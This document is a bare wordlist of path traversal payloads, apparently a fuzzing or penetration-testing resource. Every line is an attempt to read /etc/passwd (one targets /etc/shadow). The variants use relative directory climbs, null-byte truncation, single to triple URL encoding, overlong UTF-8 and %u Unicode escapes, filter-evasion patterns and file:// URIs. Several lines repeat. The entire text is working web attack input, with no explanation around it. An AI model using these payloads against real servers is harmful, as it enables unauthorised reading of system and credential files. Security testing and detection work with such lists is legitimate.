../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../etc/passwd%00
../../../../etc/passwd%00.jpg
../../../../etc/passwd%00.html
../../../../../../etc/passwd%00.jpg
../../../../../../etc/passwd%00.png
../../../../../../../../etc/passwd%00.gif
../../../../../../../../../../../../etc/passwd%00.pdf
../../../../../../../../../../../../etc/passwd%00.txt
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%2e%2f%252e%2e%2fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%c0%afetc/passwd
..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
..././etc/passwd
..././..././etc/passwd
..././..././..././etc/passwd
..././..././..././..././etc/passwd
./././././././././././etc/passwd
/./././././././././././etc/passwd
....................\etc\passwd
/..../..../..../..../..../..../etc/passwd
.\./.\./.\./.\./.\./.\./etc/passwd
file:///etc/passwd
file://../../etc/passwd
file:///../../etc/passwd
/etc/passwd
//etc/passwd
///etc/passwd
/var/www/html/../../../etc/passwd
/usr/local/apache2/conf/../../../etc/passwd
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e/etc/passwd
%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%252e%252e/%252e%252e/etc/passwd
..%252f..%252f..%252fetc/passwd
..%255c..%255c..%255cetc/passwd
%00../../../../../../etc/passwd
%00/etc/passwd%00
/../../../../../../../../%2A
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/passwd
/etc/passwd....................................
/etc/passwd/././././././
/etc/passwd/
%2e%2e%2fetc%2fshadow
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e/etc/passwd
%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%c0%afetc/passwd
..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
..%u2215etc/passwd
..%u2215..%u2215etc/passwd
..%u2215..%u2215..%u2215etc/passwd
..%u2216etc/passwd
..%u2216..%u2216etc/passwd
..%u2216..%u2216..%u2216etc/passwd
%2e%2e%2fetc%2fpasswd%00
%2e%2e%2fetc%2fpasswd%2500
%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
%252e%252e%252fetc%252fpasswd%00
..%c0%afetc/passwd%00
..%c0%af..%c0%afetc/passwd%00
%25252e%25252e%25252fetc%25252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
..%c1%9cetc/passwd
..%c1%9c..%c1%9cetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd
%u002e%u002e%u002fetc%u002fpasswd
%u002e%u002e%u002f%u002e%u002e%u002fetc%u002fpasswd
%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002fetc%u002fpasswd
%2e%2e/etc/passwd
..%2fetc/passwd
%2e%2e%2fetc/passwd
%252e%252e/etc/passwd
..%252fetc/passwd
%2e%2e%c0%afetc/passwd
